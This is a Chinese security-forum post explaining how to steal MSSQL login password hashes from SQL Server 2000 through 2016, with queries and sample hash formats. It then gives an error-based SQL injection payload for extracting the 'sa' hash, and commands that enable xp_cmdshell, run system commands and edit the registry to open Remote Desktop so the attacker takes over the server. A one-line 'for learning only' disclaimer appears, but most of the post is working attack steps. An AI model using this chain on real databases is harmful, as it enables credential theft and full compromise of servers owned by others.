安全矩阵

 找回密码
 立即注册
搜索
查看: 2042|回复: 0

窃取MSSQL各版本密码HASH

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-5-12 21:44:20 | 显示全部楼层 |阅读模式
原文链接:窃取MSSQL各版本密码HASH

MSSQL使用自制的密码哈希算法对用户密码进行哈希,在内网渗透中,大多数服务口令都是一样的,收集MSSQL数据库的用户和密码可能会有用。

本文仅用于学习

01MSSQL各版本密码HASH
MSSQL 2000版本
  1. select name,password from master.dbo.sysxlogins

  2. Hash格式:
  3. 0x0100(固定) + 8位key+40位HASH1 +40位HASH2
  4. 0x0100AC78A243F2E61FA800A7231C501D49CDA5B93A8A2294DC68AE487C99233F245F86A9ED5749F1838021EE1610
复制代码



MSSQL 2005版本
  1. select name,password_hash from sys.sql_logins

  2. Hash格式:
  3. 0x0100(固定) +8位key+ 20位HASH1 + 20位HASH2
  4. 0x01004086CEB698DB9D0295DBF84F496FDDCECADE1AE5875EB294
复制代码





MSSQL 2008 R2版本
  1. Select name,password_hash from sys.sql_logins where name = 'sa'

  2. Hash格式:
  3. 0x0100(固定) +8位key+ 20位HASH1 + 20位HASH2
  4. 0x0100A9A79055CACB976F1BE9405D2F7BE7B2A98003007978F821
复制代码





MSSQL 2012 R2版本

  1. select name,password_hash from sys.sql_logins

  2. 0x02009B23262ECB00E289977FA1209081C623020F2D28E23B5C615AC7BA8C0F25FEE638DC2E4DEAF023350C1E31199364879A94D65FC79F10BB577D6CB86A8C7148928DC8AFFB
复制代码



SQL Server 2016版本


  1. select name,password_hash from sys.sql_logins

  2. 0x02002F8E6FBBE1B6A9961A7E397FDD3A26F795DF806A066940B26323BE89F3450064C8657C75E2A3729E8318BBE91692335F4D2F5633BADEF7A25EC8AC003E9C4DB342312505
复制代码


02、SQL注入获取Sa账号密码
(1) 通过报错注入获取sa账户的哈希密码


  1. ?Keyword=1111%' AND (Select  master.dbo.fn_varbintohexstr(password) from master.dbo.sysxlogins where name='sa')=1 AND '%'='
复制代码


(2)解密获取sa明文密码

(3)在内网或数据库端口开放的情况下,可直接连入数据库执行系统命令,获取服务器控制权限。

  1. # 开启xp_cmdshell存储过程
  2. EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  3. # 利用xp_cmdshell执行系统命令
  4. Exec master.dbo.xp_cmdshell '
  5. # SQL语句开启远程
  6. Exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
复制代码










回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-21 05:40 , Processed in 0.017567 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表